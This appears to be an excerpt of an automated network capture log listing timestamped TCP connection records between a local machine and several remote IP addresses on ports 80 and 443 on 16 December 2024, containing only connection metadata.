                                                                                                                                                                                  Dec 16, 2024 18:28:49.432411909 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.432548046 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.512567997 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.512715101 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.513799906 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.513928890 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.583929062 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.584028959 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587526083 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587637901 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587671041 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.587738991 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.592969894 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.593045950 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.600295067 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.600351095 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.601514101 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.601598024 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.608911991 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.609011889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.613214016 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.613292933 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.617553949 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.617620945 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.626780987 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.627166986 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.630506992 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.630579948 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.641366959 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.641470909 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.644814014 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.644891024 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.653943062 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.654047966 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.657449007 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.657514095 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.667726040 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.667831898 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.671133995 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.671199083 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.681277990 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.681349039 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.684777021 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.684844017 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.694988012 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.695210934 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.696930885 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.697000027 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708509922 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708612919 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708647013 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.708718061 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.728904009 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.729079962 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746567965 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746731997 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746752024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.746819019 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775552034 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775753021 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775785923 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.775855064 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778290033 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778362989 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778486013 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.778553963 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.783144951 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.783215046 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786133051 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786240101 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786334038 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.786401033 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797349930 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797456980 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797470093 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797614098 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797627926 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.797693968 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807565928 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807693005 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807723045 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.807868004 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818173885 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818294048 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818383932 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.818532944 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828568935 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828774929 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828804970 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.828977108 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839087009 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839179993 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839199066 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.839348078 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.848740101 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.848829031 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.848843098 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.849001884 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.858676910 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.858767986 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.858802080 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.859011889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869096041 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869286060 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869299889 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.869365931 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:49.878739119 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:49.878815889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.091005087 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.091890097 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.091967106 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.092027903 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.092082977 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099280119 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099380970 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099409103 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.099479914 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100523949 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100610018 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100677013 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100749016 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100764036 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.100836039 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107460976 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107569933 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107599020 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.107647896 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109128952 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109193087 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109215021 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.109267950 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115792036 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115880013 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115931988 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.115993023 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117471933 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117605925 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117624998 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.117686033 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.123950005 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.124007940 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.124109030 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.124166012 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125777960 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125830889 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125910044 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.125956059 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130378962 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130466938 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130486965 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.130599022 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.133626938 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.133706093 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.134038925 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.134111881 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137676001 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137732983 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137878895 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.137932062 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141345024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141427040 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141464949 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.141519070 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145679951 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145772934 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145849943 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.145931005 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149233103 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149296999 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149584055 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.149636030 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.152820110 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.152896881 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.153002024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.153060913 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156208992 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156261921 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156411886 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.156465054 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160003901 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160084963 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160267115 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.160321951 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163564920 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163707018 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163779974 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.163836956 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.166680098 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.166744947 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.167052984 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.167112112 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170002937 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170068979 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170156956 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.170303106 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173156977 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173222065 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173275948 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.173335075 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177139044 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177261114 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177275896 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.177331924 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179487944 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179559946 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179660082 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.179721117 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182508945 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182586908 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182600975 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.182652950 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185471058 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185544014 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185612917 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.185674906 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189692974 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189788103 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189800024 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.189862013 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:28:50.190324068 CET44349737142.250.181.1192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:28:50.190388918 CET49737443192.168.2.4142.250.181.1
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437845945 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437956095 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:08.437990904 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:08.488262892 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:09.685869932 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:09.687465906 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:09.687501907 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.139029980 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.139122963 CET44349774104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.139424086 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:10.140122890 CET49774443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:10.146505117 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.147077084 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.266858101 CET8049768158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.266881943 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:10.267049074 CET4976880192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.267090082 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.267282963 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:10.389045954 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.475013018 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476430893 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476522923 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476660013 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476874113 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:11.476908922 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:11.519557953 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:12.708429098 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:12.710028887 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:12.710076094 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174031019 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174108028 CET44349781104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174432993 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:13.174627066 CET49781443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:13.177759886 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.178721905 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.297971964 CET8049779158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298096895 CET4977980192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298592091 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298687935 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.298779011 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:13.419991016 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.506438017 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508114100 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508169889 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508605957 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508754015 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:14.508781910 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:14.550704956 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:15.733314991 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:15.735764980 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:15.735786915 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426434994 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426491976 CET44349792104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426594019 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:16.426959038 CET49792443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:16.430339098 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.431543112 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551002026 CET8049787158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551101923 CET4978780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551302910 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551404953 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.551518917 CET4979780192.168.2.4158.101.44.242
                                                                                                                                                                                  Dec 16, 2024 18:29:16.671205044 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.767580986 CET8049797158.101.44.242192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769241095 CET49800443192.168.2.4104.21.67.152
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769296885 CET44349800104.21.67.152192.168.2.4
                                                                                                                                                                                  Dec 16, 2024 18:29:17.769428968 CET49800443192.168.2.4104.21.67.152
